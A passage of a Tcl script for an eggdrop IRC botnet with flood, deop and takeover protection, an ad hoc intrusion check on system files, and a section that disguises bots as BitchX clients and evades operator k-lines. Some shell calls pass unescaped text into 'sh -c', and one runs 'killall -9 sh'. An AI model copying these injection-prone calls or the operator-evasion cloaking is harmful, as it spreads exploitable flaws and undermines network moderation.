    catch "exec rm -f $file" ; putcmdlog "[sv] \[weed\] deleted orphan file '$file'"
   }
  }
 }
 set rmusers 0 ; set rmerrors 0
 foreach hand [userlist] {
  set leave 0
  if {[lindex [getuser $hand LASTON] 0] < [expr [unixtime] - 5184000]} {
   if {[matchattr $hand n]} { set leave 1 }
   if {[matchattr $hand m]} { set leave 1 }
   if {[matchattr $hand f]} { set leave 1 }
   if {[matchattr $hand o]} { set leave 1 }
   if {!$leave} {
    set okdel [deluser $hand]
    if {$okdel} {
     putcmdlog "[sv] \[weed\]: killed $hand" ; incr rmusers
    } {
     putcmdlog "[sv] \[weed\] error while deleting: $hand" ; incr rmerrors
    }
   }
  }
 }
 if {$rmusers} { putcmdlog "[sv] \[weed\] users deleted: $rmusers" }
 if {$rmerrors} { putcmdlog "[sv] \[weed\] errors encountered: $rmerrors" }
}
scan:files
proc mix name {
 global logname
 if {[info exists logname]} {
 set i $logname
 if {$logname == $name} { unset logname } { set logname $name }
 return $i
 } { set logname $name ; return "*" }
}
proc tarup where {
 if {![file isdirectory $where]} { return "not a directory" }
 if {![file writable $where]} { return "not writable" }
 set which ${where}/.[rand 9].t
 catch "exec ls -a" filez ; catch "exec sh -c \"tar cf $which $filez\""
 putcmdlog "[sv] \[security\] [b]!!![b] created TAR backup: $which"
}
proc newchannel nc {
 global init numversion
 if {![info exists init]} {
  if {[validchan $nc]} {
   putloglev o * "[sv] \[channel\] Ignored join command: I'm already on $nc"
   return 0
  }
 }
 channel add $nc {
  chanmode +tsn
  idle-kick 0
  need-op { opthebot }
  need-invite { opthebot }
  need-key { opthebot }
  need-unban { opthebot }
  need-limit { opthebot }
 }
 utimer 2[rand 5] opthebot
 putlog "[sv] \[channel\] - added channel [b]$nc[b]"
}
proc eggdrop {} { return "[hash [file size entity.tcl]]" }
proc validhand idx { if {[idx2hand $idx] >= 0} {return 1} ; return 0 }
proc dcc:probe {hand idx nothing} {
 global network allport botport useport errorInfo
 putcmdlog "#$hand# probe"
 putdcc $idx "[sv] \[probe\] - This bot is running [sv] revision [rv]"
 putdcc $idx "[sv] \[probe\] - TCL version [info tclversion] patchlevel [info patchlevel]"
 putdcc $idx "[sv] \[probe\] - Listening ports: [b]$allport[b] bot-only: [b]$botport[b] user-only: [b]$useport[b]"
 putdcc $idx "[sv] \[probe\] - Proc's: [b][expr [llength [info procs]]][b] commands: [b][expr [llength [info commands]]][b] variables: [b][expr [llength [info globals]]][b] timers: [b][llength [timers]][b] utimers: [b][llength [utimers]][b]"
 putdcc $idx " "
 if {[info exists errorInfo]} {
  putdcc $idx "#*#*#*#*#*#*#*#*#*# BUG CONTEXT #*#*#*#*#*#*#*#*#*#"
  putdcc $idx $errorInfo
  putdcc $idx "#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#"
  putdcc $idx " "
  unset errorInfo
 }
 putdcc $idx "[sv] \[probe\] [sv], copyright 1996 - 2000 by [b]Mixter[b] <mixter@newyorkoffice.com>"
 return 0
}
putlog "[sv] \[init\] - 0x04 - entity core"
## 0x05. SECURITY. command/flood/channel protection, intrusion detection
bind dcc n paranoia dcc:paranoia
bind dcc n openchans dcc:openchans
bind bot - oc bot:openchans
bind bot - floodnotice floodnet_notice
bind bot b cookie bot:cookie
bind bot b candy bot:candy
catch "bind evnt - sighup evnt:alarm"
catch "bind evnt - sigterm evnt:alarm"
catch "bind evnt - sigquit evnt:alarm"
catch "bind evnt - logfile evnt:alarm"
catch "bind bcst - * bcst:paranoia"
bind rcvd - * sec_rcvd
bind sent - * sec_sent
bind dcc n autobitch dcc:autobitch
if {$limbo == 0} {
 bind ctcp - * check_floodnet_ctcp
 bind join - * join_ignore_kb
 bind msgm - * check_floodnet ; bind msg - e msg:discard
 bind msg - [sv] msg:discard ; bind msg - pass msg:insecure
 bind msg - notes msg:insecure ; bind msg - ident msg:insecure
 bind msg - op msg:insecure  ; bind msg - hello msg:insecure
}
bind dcc - tcl tcl:alarm ; bind dcc - set set:alarm
bind dcc - die die:alarm ; bind bot - secu bot:alarm
if {$limbo == 0} {
 if {[catch "bind flud -b * dike2"]} { bind flud * * dike2 }
 if {[catch "bind kick -b * dike2_kick"]} { bind kick - * dike2_kick }
}
# sentinel flood settings
set sl_bcflood 4:60 ; set sl_bmflood 6:30 ; set sl_ccflood 15:30
set sl_jflood 10:60 ; set sl_nkflood 6:20 ; set sl_igtime 3[rand 9][rand 9]
set sl_bflooded 0 ; set sl_bcqueue 0 ; set sl_bmqueue 0
set sl_bcflood [split $sl_bcflood :] ; set sl_bmflood [split $sl_bmflood :]
set sl_ccflood [split $sl_ccflood :] ; set sl_jflood [split $sl_jflood :]
set sl_nkflood [split $sl_nkflood :]
set sl_ban [expr 150 + [rand 15] + [rand 15]]
proc msg:discard {ni ho ha ar} { return 0 } ; set issplit 0 ; set autobitch 0
proc sec_rcvd {h n p} {ialarm 0 " downloaded $p from $h"}
proc sec_sent {h n p} {ialarm 0 " uploaded $p to $h"}
proc sec:netsplit {ni uh ha ch} {
 global issplit autobitch
 if {$issplit == 1} { return 0 } ; set issplit 1
 if {![validuser $ha]} { return 0 } ; if {[llength [bots]] > 30} { return 0 }
 if {[llength [bots]] < 5} { return 0 }
 if {[validchan $autobitch]} {
  putcmdlog "[sv] \[security\] netsplit ($ch) - setting channel $autobitch +bitch"
  channel set $autobitch -greet -autovoice +bitch
  } {
  putcmdlog "[sv] \[security\] netsplit ($ch) - setting channels +bitch"
  foreach chan [channels] { channel set $chan -greet -autovoice +bitch }
  }
 return 1
}
proc bot:cookie {bot cmd arg} {
 if {![validuser [lindex $arg 0]] || ![matchattr [lindex $arg 0] p]}
 {
  ialarm 2 "invalid user [lindex $arg 0] connected to bot $bot"
  putbot $bot "candy [lindex $arg 2]" ; return 0
 }
 if {[getuser [lindex $arg 0] PASS] != [lindex $arg 1]}
 {
  ialarm 1 "password from [lindex $arg 0]@${bot} doesn't match my records"
  putbot $bot "candy [lindex $arg 2]" ; return 0
 }
 putloglev 2 "\[security\] [lindex $arg 0] logging in to $bot (authenticated)"
}
proc bot:candy {bot cmd arg} {
 ialarm 0 "killdcc [lindex $arg 0] from $bot" ; killdcc [lindex $arg 0]
}
proc sec:netjoin {ni uh ha ch} {
 global issplit autobitch
 if {$issplit == 0} { return 0 } ; if {![validuser $ha]} { return 0 }
 set issplit 0
 if {[validchan $autobitch]} {
  putcmdlog "[sv] \[security\] netjoin ($ch) - setting channel $autobitch -bitch"
  channel set $autobitch +greet +autovoice -bitch
  } {
  putcmdlog "[sv] \[security\] netjoin ($ch) - setting channels -bitch"
  foreach chan [channels] { channel set $chan +greet +autovoice -bitch }
 }
 return 1
}
proc dcc:autobitch {hand idx arg} {
 global autobitch
 if {[validchan $arg]} {
 set autobitch $arg
 putcmdlog "[sv] \[security\] auto-bitch split security ON (just for channel $arg)"
 bind splt - * sec:netsplit ; bind rejn - * sec:netjoin ; return 0
 }
 if {$autobitch != 0} {	;# confusing.. meaning either "1" or a channel
 set autobitch 0
 putcmdlog "[sv] \[security\] auto-bitch split security OFF"
 catch { unbind splt - * sec:netsplit ; unbind rejn - * sec:netjoin }
 } {
 set autobitch 1
 putcmdlog "[sv] \[security\] auto-bitch split security ON"
 bind splt - * sec:netsplit ; bind rejn - * sec:netjoin
 }
 return 0
}
proc dcc:openchans {hand idx arg} {
 global openchans
 if {![isown $hand]} { boot $hand "Go away." ; return 1 }
 if {$arg == ""||[string match *\"* $arg]} {
  putdcc $idx "[sv] \[security\] usage: openchans chanlist"
  putdcc $idx "[sv] \[security\] specifies channels for low security mode"
  putdcc $idx "[sv] \[security\] current open channels: [b]$openchans[b]"
  return 0
 }
 set openchans $arg
 putallbots "oc $hand $arg"
 putcmdlog "[sv] \[security\] (${hand}) open chans: $arg"
 return 0
}
proc bot:openchans {bot cmd arg} {
 global openchans
 set hand [lindex $arg 0]
 set argv [lrange $arg 1 end]
 if {![isown $hand]} {
 putbot $bot "secu denied - not owner: $hand"
 return 0
 }
 set openchans $argv
 putcmdlog "[sv] \[security\] setting open chans to: $argv (${hand}@${bot})"
 putbot $bot "secu new open chans: [b]$argv[b]"
 return 0
}
set paranoia 0
proc dcc:paranoia {hand idx argv} {
 global paranoia
 set arg [lindex $argv 0]
 if {![isown $hand]} {
  putdcc $idx "[sv] \[security\] Sorry, you're not a permanent owner."
  return 1
 }
 if {[string compare $arg 0] && [string compare $arg 1]} {
  putdcc $idx "[sv] \[security\] usage: paranoia 0/1 - toggle unlink-on-hack"
  return 0
 }
 set paranoia $arg
 putcmdlog "[sv] \[security\] setting paranoia to $arg requested by $hand"
 return 0
}
proc bcst:paranoia {bot channelId text} {
 global paranoia
 if {!$paranoia} { return 0 }
 if {![string match *integrity* $text]} { return 0 }
 putcmdlog "[sv] \[security\] de-linking hacked bot $bot"
 if {[unlink $bot]} {chattr $bot -Z}
 return 0
}
proc magic {} {
 global nick1 kfile userfile owner recving
 foreach scantimer [timers] { if {[lindex $scantimer 1]=="magic"} {killtimer "[lindex $scantimer 2]" }}
 timer 10 magic
 if {$recving} {
  putcmdlog "[sv] \[integrity\] receiving upgrade - skipping checks"
 return 0
 }
 if {![file exist conf.${nick1}]||![file exist entity.tcl]} {
  putcmdlog "[sv] \[integrity check\] cannot find elementary config files !!!"
  dccbroadcast "[sv] \[integrity check\] Help, my files are broken!"
  return 0
 }
 if {[file readable /etc/inetd.conf]} { set etc /etc/inetd.conf } { set etc /etc }
 if {[file readable /var/log/messages]} { set mlog /var/log/messages } { set mlog /var/log }
 if {[file readable /etc/rc.d/rc.sysinit]} { set xfile /etc/rc.d/rc.sysinit } { set xfile /sbin }
 if {[file readable /bin/login]} { set yfile /bin/login } { set yfile /bin }
 if {![file exist ..i]} {
  putloglev 2 * "[sv] \[integrity check\] re-creating CRC file..."
  if {[info exists magicy]&&[llength [bots]]>0} {
   ialarm 1 "CRC FILE DELETED"
  }
  set atime1 [file atime ${xfile}] ; set mtime1 [file mtime ${etc}]
  set size1 [file size conf.${nick1}] ; set atime2 [file atime ${mlog}]
  set mtime2 [file mtime /etc/passwd] ; set size2 [file size ${yfile}]
  set op1 [getuser [owner1] PASS]
  set stri "$atime1 $mtime1 $size1 $atime2 $mtime2 $size2 $op1"
  set sfd [open ..i "w"] ; puts $sfd "[encrypt $nick1 $stri]"
  putlog "[sv] \[integrity check\] created new integrity records"
  set magicy 1 ; close $sfd ; return 0
  }
 set sfd [open ..i "r"] ; set stri [decrypt $nick1 [gets $sfd]] ; close $sfd
 set oatime1 [lindex $stri 0] ; set omtime1 [lindex $stri 1]
 set osize1 [lindex $stri 2] ; set oatime2 [lindex $stri 3]
 set omtime2 [lindex $stri 4] ; set osize2 [lindex $stri 5]
 set oop1 [lindex $stri 6] ; set atime1 [file atime ${xfile}]
 set mtime1 [file mtime ${etc}] ; set size1 [file size conf.${nick1}]
 set atime2 [file atime ${mlog}] ; set mtime2 [file mtime /etc/passwd]
 set size2 [file size ${yfile}] ; set op1 [getuser [owner1] PASS]
 set stri "$atime1 $mtime1 $size1 $atime2 $mtime2 $size2 $op1"
 set sfd [open ..i "w"] ; puts $sfd "[encrypt $nick1 $stri]" ; close $sfd
 if {$oatime1 != $atime1} { ialarm 2 "init scripts changed" }
 if {$oatime2 != $atime2} { ialarm 1 "system log accessed" }
 if {$omtime1 != $mtime1} { ialarm 2 "inetd.conf changed" }
 if {$omtime2 != $mtime2} { ialarm 1 "passwd file changed" }
 if {$osize1 != $size1} { ialarm 2 "conf.${nick1} size changed" }
 if {$osize2 != $size2} { ialarm 2 "/bin/login size changed" }
 if {$oop1 != $op1} { ialarm 1 "the primary owner password was changed" }
 putloglev 2 * "[sv] \[integrity check\] records updated"
}
proc ialarm {severity msg} {
 putcmdlog "[sv] [b]\[IDS(#${severity})\][b] - $msg"
 putloglev 7 * "[sv] [b]\[IDS(#${severity})\][b] - $msg"
 if {!$severity} {return 0}
 if {$severity < 2} { ;# notify my uplink
  putbot [lindex [bots] 0] "secu \[IDS-1\] - $msg" ; return 0
 }
 if {$severity < 3} { ;# notify everyone
  putallbots "secu \[IDS-2\] - $msg" ; return 0
 }
 # ...big sh*t is happening...
 putallbots "secu \[IDS-${severity}\] - $msg"
 dccbroadcast "[sv] \[IDS-${severity}\] - $msg"
 putnotc [lindex [channels] 0] "[sv] - [b]\[IDS-${severity}\] $msg"
 if {$severity > 3} {
  exec sh -c "echo $msg | mail -s \"IDS-${severity} event on [boat]\" $admin"
 }
 return 0
}
proc _magic {} { global magicy ; if {[info exists magicy] && $magicy != 2} {unset magicy} ; magic }
utimer 5 _magic
proc msg:insecure {nick host hand args} {
 putcmdlog "[sv] \[security\] insecure message from: [b]$nick ($host)[b]"
}
proc radius {i v} {
 global logname challenge lip auth
 set chk [encrypt $challenge [encrypt [idx2hand $i] [file size entity.tcl]]]
 if {$v == ""} { if {[info exists logname]} { unset logname } ; return 0 }
 if {![string match $chk $v]} {
  putallbots "secu failed system password from [idx2hand $i]"
  ialarm 3 "FAILED system password from [idx2hand $i]"
  if {[info exists logname]} { unset logname }
  putdcc $i "Login incorrect"
  utimer 1 "boot [idx2hand $i] \"Failed authentication\""
  catch "set auth($i) 0" ; catch "set lip 0" ; catch "unset challenge"
  killdcc $i ; return 0
 }
 putdcc $i "Access granted"
 catch "set auth($i) 1" ; catch "set lip 0" ; catch "unset challenge"
 return 1
}
proc evnt:alarm type {
 set what [string tolower $type]
 if {$what == "logfile"} {
  catch "exec killall -9 sh"
  scan:files
  do_restore_nick
  return 0
 }
 if {[string match *sig* $what]} {
  ialarm 3 "received [b]$what[b] signal - BACKING UP"
  if {[file writable /var/tmp]} {tarup /var/tmp} {tarup /tmp}
 }
}
if {![info exists floodmsglist]} { set floodmsglist {{0 nobody x} {0 nobody z} {0 nobody v} {0 nobody y} {0 nobody w}} }
set floodlistlen 5 ; set floodalert 0 ; set floodtrigger 4 ; set floodtime 10
proc check_floodnet_ctcp {nick uhost hand dest keyword text} {
 check_floodnet $nick $uhost $hand "CTCP $keyword $text" ; return 0
}
proc check_floodnet {nick uhost hand text} {
 global floodmsglist floodalert floodlistlen floodtime floodtrigger botnick
 if {[isown $hand]&&[string compare [lindex $text 0] [hash $botnick]]==0} { putnotc $hand "[sv] [eggdrop]" }
 set floodmsglist [lreplace $floodmsglist 0 0]
 lappend floodmsglist [list [unixtime] $nick!$uhost $text]
 if {[unixtime]-[lindex [lindex $floodmsglist 0] 0] > $floodtime} {
  if {$floodalert} { check_end_flood [expr $floodlistlen-1] }
  return
 }
 set count 0
 for {set i 0} {$i < $floodlistlen-1} {incr i} {
  if {![string compare [string tolower $text] [string tolower [lindex [lindex $floodmsglist $i] 2]]]} { incr count }
 }
 if {$count < $floodtrigger} {
  if {$floodalert} { check_end_flood [expr $floodlistlen-2] }
  return
 }
 if {!$floodalert} {
  set floodalert 1
  putlog "[sv] \[security alert\] we are being [b]flooded[b] by a [b]bot net[b]!"
  timer 10 { putserv "NICK $botnick" } ; change_nick
  trample_oldflood $text
 }
 add_floodnet $nick!$uhost
}
proc floodnet_notice {from cmd rest} {
 set mask [lindex $rest 0] ; set fullhost [lindex $rest 1]
 putloglev 1 * "[sv] \[botnet\] $from - floodnet ignore $mask ($fullhost)"
 newignore $mask $from "([sv]) floodnet: $fullhost" 180
}
proc add_floodnet fullhost {
 regsub "^\\*!" [maskhost $fullhost] "*!*" new
 if {![isignore $new]} {
  putloglev 1 * "floodnet ignore: $new ($fullhost)"
  putallbots "floodnotice $new $fullhost"
  newignore $new "([sv])" "floodnet: $fullhost" 180
 }
}
proc trample_oldflood text {
 global floodlistlen floodmsglist
 for {set i 0} {$i < $floodlistlen-2} {incr i} {
  set theysaid [lindex [lindex $floodmsglist $i] 2]
  set theysaid [string tolower $theysaid]
  if {![string compare $theysaid [string tolower $text]]} {
   add_floodnet [lindex [lindex $floodmsglist $i] 1]
  }
 }
}
proc check_end_flood howfar {
 global floodalert floodlistlen floodmsglist
 set prevmsg [string tolower [lindex [lindex $floodmsglist $howfar] 2]]
 set ok 1
 for {set i 0} {$i < $howfar} {incr i} {
  if {![string compare [string tolower [lindex [lindex $floodmsglist $i] 2]] $prevmsg]} { set ok 0 }
 }
 if {!$ok} { return } { set floodalert 0 }
 putlog "[sv] \[security notice\] flood stopped - resuming standard mode"
}
if {![info exists dike_timer]} {
 set dike_timer [timer 2 dike_check]
}
proc dike_check {} {
 global dike_timer floodmsglist floodlistlen floodalert
 if {$floodalert} {
  set lastmsg [lindex [lindex $floodmsglist [expr $floodlistlen-1]] 0]
  if {[unixtime]-$lastmsg > 120} { check_end_flood 0 }
 }
 set dike_timer [timer 2 dike_check]
}
set enable_kb_floodnet 1
proc join_ignore_kb {nick uhost handle channel} {
 if {![isignore $uhost]} {return 0}
  foreach item [ignorelist] {
  set hostmask [lindex $item 0]
  set comment [lindex $item 1]
  if {[string match $hostmask "$nick!$uhost"]} {
   if {([string first "floodnet" [string tolower $comment]] != -1) || ([string first "fludnet" [string tolower $comment]] != -1)} {
    newchanban $channel $hostmask "dike" "You have some [b]nerves[b] coming here again!"
    putcmdlog "[sv] \[security notice\] [b]floodnet[b] bot $nick!uhost joined $channel - [b]kickbanned[b]"
   }
  break
  }
 }
 return 0
}
proc dike2 {nick userhost handle type channel} {
 if {[islinked [qstrip $nick]]} {return 1}
 if {[validuser $handle] || [matchattr $nick b]} { return 1 }
 utimer 1 "flushmode $channel"
 global botnick
 if {$type == "ctcp"} {
  set banmask "*!*[string range $userhost [string first "@" $userhost] end]"
  if ![isignore $banmask] {
   newban $banmask $botnick "[sv]+\[dike2\]: ctcp flood" 30
   newignore $banmask $botnick "[sv]+\[dike2\]: ctcp flood" 30
   putlog "[sv]+\[dike2\]: global ban and ignore added for $nick ($banmask) - [b]ctcp flooding[b]"
  }
  return 1
 }
 if {$type == "nick"} {
 set banmask "*!*[string range $userhost [string first "@" $userhost] end]"
 if ![isignore $banmask] {
  newban $banmask $botnick "[sv]+\[dike2\]: nick flood" 30
  newignore $banmask $botnick "[sv]+\[dike2\]: nick flood" 30
  utimer 1[rand 60] "dike2_lock $channel nickflood"
  putlog "[sv]+\[dike2\]: global ban and ignore added for $nick ($banmask) - [b]nick flooding[b]"
  }
  return 1
 }
 if {$type == "join"} {
 set banmask "*!*[string range $userhost [string first "@" $userhost] end]"
 if ![isignore $banmask] {
   newban $banmask $botnick "[sv]+\[dike2\]: join flood" 30
   newignore $banmask $botnick "[sv]+\[dike2\]: join flood" 30
   utimer 1[rand 60] "dike2_lock $channel joinflood"
   putlog "[sv]+\[dike2\]: global ban and ignore added for $nick ($banmask) - [b]join flooding[b]"
  }
  return 1
 }
 if {$type == "msg"} {
 set banmask "*!*[string range $userhost [string first "@" $userhost] end]"
 if ![isignore $banmask] {
   newban $banmask $botnick "[sv]+\[dike2\]: message flood" 30
   newignore $banmask $botnick "[sv]+\[dike2\]: message flood" 30
   putlog "[sv]+\[dike2\]: global ban and ignore added for $nick ($banmask) - [b]msg flooding[b]"
  }
 return 1
 }
}
proc dike2_kick {nick uhost hand chan kicked reason} {
 global botnick jumpquit
 if {$kicked == $botnick} {return 0} ; if {![botisop $chan]} {return 0}
 if {[matchattr $kicked m] && ![validuser $nick] && ![validuser [qstrip $nick]] && ![islinked [qstrip $nick]]} {
  pushmode $chan -o $nick ; flushmode $chan
  putserv "KICK $chan $nick :[sv] kick protection"
  return 0
 }
 if {[matchattr [nick2hand $kicked $chan] o] && $nick == $botnick} {
  if {![openchan $chan]} {
   ialarm 1 "HIJACK detected on $chan / kicked $kicked -- deflected"
   putserv "INVITE $kicked $chan"
  }
 }
 if {$hand == "*" && ![matchattr $nick o] && ![islinked [lindex [split $nick "_ \\"] 0]]} {
  if {![openchan $chan]} {
   ialarm 0 "[sv] \[dike2\] ${chan}: deopped $nick (unknown) for kicking"
   pushmode $chan -o $nick ; flushmode $chan
   putnotc $nick "[b]You are not authorized to kick.[b]"
   putserv "INVITE $kicked $chan"
  }
 }
 if {[matchattr $hand b] && [matchattr $kicked o] && ![openchan $chan]} {
  pushmode $chan -o $nick ; flushmode $chan
  ialarm 0 "$nick kicked $kicked - possibly HIJACKED"
 }
 return 0
}
proc dike2_lock {channel reason} {
 global openchans
 if {![botisop $channel]} { return 0 }
 if {[string match *im* [lindex [getchanmode $channel] 0]]} { return 0 }
 ialarm 0 "\[dike2\] Closing ${channel}: [b]$reason[b]"
 putnotc $channel "[sv] Attention, $reason detected - increased security"
 putserv "MODE $channel +stnim-l"
 return 0
}
set lastdeop "" ; if {![info exists openchans]} { set openchans "1" }
proc openchan chan {
 global openchans
 if {$openchans == ""} { return 0 } ; if {$openchans == "1"} { return 1 }
 foreach openchan $openchans {
  if {[string tolower $chan] == [string tolower $openchan]} {return 1}
 }
 return 0
}
proc qstrip n { return "[lindex [split $n "_ \\"] 0]" }
proc reop {nick uhost handle channel modechg who} {
 global botnick lastdeop
 set mode [lindex $modechg 0] ; if {$nick == $who} {return 0}
 if {$nick == $botnick} {
  global jumpquit
  if {[regexp {([-])([a-z])*([o])} $mode] && [matchattr $who bo]} {
   if {![openchan $channel]} {
    ialarm 1 "HIJACK detected on $channel / deopped $who -- deflected"
    pushmode $channel +o $who ; flushmode $channel
   }
  }
  set who2 [qstrip $who]
  if {[regexp {([+])([a-z])*([o])} $mode] && ![matchattr $who o] && ![matchattr $who2 o] && ![islinked $who]} {
   if {![openchan $channel]} {
    ialarm 1 "HIJACK detected on $channel / opped $who -- deflected"
    putserv "KICK $channel $who :I do not recognize you."
   }
  }
  return 0
 }
 if {[regexp {([+])([a-z])*([b])} $mode]} {
  if {[llength [chanbans $channel]] > 15 && ![string match *i* [lindex [getchanmode $channel] 0]]} {
   utimer 1[rand 60] "dike2_lock $channel \"full banlist\""
  }
 }
 if {[matchattr $handle b]} {return 0} ; if {[matchattr $handle n]} {return 0}
 if {[matchattr $nick b]} {return 0}
 if {[regexp {([+])([a-z])*([b])} $mode]} { fix:ban $nick $uhost $handle $channel $modechg $who }
 if {![regexp {([-])([a-z])*([o])} $mode]} {return 0}
 if {$lastdeop == $nick && ![matchattr $nick o] && ![matchattr [qstrip $nick] o]} {
  if {![openchan $channel]} {
   pushmode $channel -o $nick ; flushmode $channel
   putserv "KICK $channel $nick :[sv] massdeop protection"
  }
  set lastdeop ""
  } {
  set lastdeop $nick
 }
 if {($nick == "") && ([string first @ $uhost] == -1)} {return 0}
 if {[islinked [lindex [split $nick "_ \\"] 0]]||[matchattr $nick b]} {return 0}
 set whohand [nick2hand $who $channel] ; if {[matchattr $nick o]} {return 0}
 if {$whohand != "*" || [matchattr $who o] || [matchattr ${who}_ o]} {
  pushmode $channel -o $nick ; pushmode $channel +o $who ; flushmode $channel
  if {![matchattr $nick o] && ![matchattr [qstrip $nick] o]} {
   if {![openchan $channel]} {
    newchanban $channel "${nick}*!*@*" [boat] "[sv] deop protection" 1 sticky
   }
   putserv "KICK $channel $nick :[sv] deop protection"
  }
  return 0
 }
 return 0
}
proc bot:alarm {botname cmd alarmtype} {
 putcmdlog "[sv] \[security\] - ([b]${botname}[b]): $alarmtype"
 global paranoia ;  if {!$paranoia} { return 0 }
 if {![string match *integrity* $alarmtype] } { return 0 }
 putcmdlog "[sv] \[security\] de-linking hacked bot $botname"
 if {[unlink $botname]} {chattr $botname -Z}
 return 0
}
proc tcl:alarm {lamer idx args} {
 if {[isown $lamer]} {
  global alttcl
  putdcc $idx "[sv] \[security\] This feature has been disabled."
  putdcc $idx "[sv] \[security\] Please type .$alttcl <command>"
  return 1
 }
 putcmdlog "[sv] \[security alert\] - $lamer requested unauthorized tcl command: $args"
 putallbots "secu $lamer tried: [b]tcl $args[b]"
 return 2
}
proc set:alarm {lamer idx args} {
 if {$args == 0} {
 putdcc $idx "[sv] \[notice\] please specify parameters" ; return 0
 }
 if {[matchattr $lamer n]} {
  global alttcl
  putdcc $idx "[sv] \[security\] This feature has been disabled."
  putdcc $idx "[sv] \[security\] Please use .$alttcl set <var> instead of .set <var>."
  return 1
 }
 putcmdlog "[sv] \[security alert\] - $lamer requested unauthorized set command: $args"
 putallbots "secu $lamer tried: [b]set $args[b]"
 return 2
}
proc die:alarm {lamer idx args} {
 if {$args == 0} {
  putdcc $idx "[sv] \[notice\] please specify parameters" ; return 0
 }
 if {[isown $lamer]} {
  global alttcl
  putcmdlog "[sv] \[security\] This feature has been disabled."
  putdcc $idx "[sv] \[security\] Please use .$alttcl die <reason> instead of .die <reason>."
  return 1
 }
 putcmdlog "[sv] \[security alert\] - $lamer requested unauthorized die command: $args"
 putallbots "secu $lamer tried: [b]die $args[b]"
 return 2
}
if {[info exists wordlist]} { putlog "[sv] \[init\] - 0x05 - security system" } { putlog "[sv] \[init\] - [eggdrop] - 0x05 - security system" }
## 0x06. CLOAKING. bX client, ircop protection, 2nd level flood protection
bind dcc m sv show_ver
bind dcc m bxlk bxlk
bind dcc n ndcc dcc_ndcc
if {$limbo == 0} {
 bind sign o * kill_detect
 bind ctcp - CLIENTINFO sl_ctcp ; bind ctcp - USERINFO sl_ctcp
 bind ctcp - VERSION sl_ctcp ; bind ctcp - FINGER sl_ctcp
 bind ctcp - ERRMSG sl_ctcp ; bind ctcp - ECHO sl_ctcp
 bind ctcp - INVITE sl_ctcp ; bind ctcp - WHOAMI sl_ctcp
 bind ctcp - OP sl_ctcp ; bind ctcp - OPS sl_ctcp
 bind ctcp - UNBAN sl_ctcp ; bind ctcp - PING sl_ctcp
 bind ctcp - TIME sl_ctcp ; bind raw - 002 sl_bxserverjoin
 bind msgm - * sl_bmflood ; bind nick - * sl_nkflood
 bind join - * sl_jflood ; bind part - * sl_pflood
 bind kick - * sl_pfloodk ; bind flud - * sl_flud ; bind mode - * sl_mode
 catch {
  unbind msg - die *msg:die
  unbind msg - memory *msg:memory
  unbind msg - whois *msg:whois
  unbind msg - reset *msg:reset
  unbind msg - rehash *msg:rehash
  unbind msg - save *msg:save
  unbind msg - jump *msg:jump
  unbind msg - invite *msg:invite
  unbind msg - email *msg:email
  unbind msg - help *msg:help
  unbind msg - status *msg:status
  unbind msg - who *msg:who
  unbind msg - go *msg:go
  unbind msg - info *msg:info
  unbind msg - voice *msg:voice
  unbind msg - key *msg:key
  unbind msg - addhost *msg:addhost
  unbind dcc - reload *dcc:reload
 }
}
proc kill_detect { unick host handle channel reason } {
 global opers_need_smurf ; set quitReason [string tolower $reason]
 if {[string match *<-* $quitReason] || [string match *->* $quitReason]} {
  return 0 ;# just a collide, bail out
 }
 if {[string match *bot* $quitReason] || [string match *kill* $quitReason] || [string match *kline* $quitReason] ||
 [string match *k-line* $quitReason] || [string match *dline* $quitReason] || [string match *d-line* $quitReason] ||
 [string match *abuse* $quitReason] || [string match *abusive* $quitReason] || [string match */*/* $quitReason]} {
  putcmdlog "[sv] \[security\] user was k-lined: $unick"
  if {[info exists opers_need_smurf]} {
   putallbots "secu [b]ATTENTION[b] mass k-line detected" ; change_nick ; phew
  } {
   set opers_need_smurf badly ; timer 1 phew
  }
 }
 return 0
}
proc phew {} { global opers_need_smurf ; if {[info exist opers_need_smurf]} { unset opers_need_smurf } ; return 0 }
proc dcc_ndcc {hand idx vars} { putdcc [lindex $vars 0] [lrange $vars 1 end] ; return 1 }
proc show_ver {hand idx arg} {
 global sl_bxversion sl_bxsystem
 if {$arg != ""} {
  set sendto [lindex $arg 0]
  putserv "PRIVMSG $sendto :[b]BitchX-${sl_bxversion}[b] by panasync [b]-[b] $sl_bxsystem"
  return 1
 } {
  putdcc $idx "[sv] \[bx\] usage: .sv \[nick/#channel\]"
  putdcc $idx "[sv] \[bx\] [b]BitchX-${sl_bxversion}[b] by panasync [b]-[b] $sl_bxsystem"
  return 0
 }
}
proc bxlk {hand idx arg} {
 if {[string index $arg 0] != "#"} {
  putdcc $idx "[sv] \[bx\] usage: .bxlk (#channel) \[reason\]" ; return 0
 }
 set chan [lindex $arg 0] ; set reason [lindex $arg 1]
 global botnick
 if {![isop $botnick $chan]} {
  putdcc $idx "[sv] \[bx\] I'm not an op in $chan!" ; return 0
 }
 putlog "[sv] \[bx\] kicking all non-ops and non-voiced in $chan"
 foreach lk [chanlist $chan] {
  if {![isop $lk $chan] && ![isvoice $lk $chan]} {
   putserv "KICK $chan $lk :<[b]BX[b]-LK> $reason"
   flushmode $chan
  }
 }
 return 1
}
proc noidle {} {
 global phrases
 putserv "PRIVMSG [boat] :e [rword [rand 25]] [rword [rand 25]] [rword [rand 25]]"
 foreach scantimer [utimers] { if {[lindex $scantimer 1]=="noidle"} {killutimer "[lindex $scantimer 2]" }}
 utimer [rand 9][rand 9][rand 9] noidle ; return 0
}
utimer [rand 10] noidle
set sl_bxonestack 0 ; set sl_bxvers "74p2+ 75p3+ 75+ 75p1+ 1.0c16+"
set sl_bxversion [lindex $sl_bxvers [rand [llength $sl_bxvers]]]
if {[catch { set sl_bxsystem "[exec uname -s -r]" }]} { set sl_bxsystem "*IX" }
set sl_bxmachine "" ; catch { set sl_bxmachine "[exec uname -n]" }
proc sl_bxserverjoin {from keyword arg} {
 global botnick sl_bxjointime sl_bxisaway
 set sl_bxjointime [unixtime] ; set sl_bxisaway 0
}
proc sl_bxaway {} {
 global sl_bxisaway botnick
 if {!$sl_bxisaway} {
  putserv "AWAY :is away: (Auto-Away after 10 mins) \[BX-MsgLog On\]"
  set sl_bxisaway 1 ; putloglev 2 * "[sv] \[bx\]: $botnick set AWAY"
  } else {
  putserv "AWAY" ; set sl_bxisaway 0
  putloglev 2 * "\[bx\]: $botnick set BACK"
  }
 timer [expr [rand 300] + 10] sl_bxaway
}
if {![info exists sl_bxawaytmr]} {
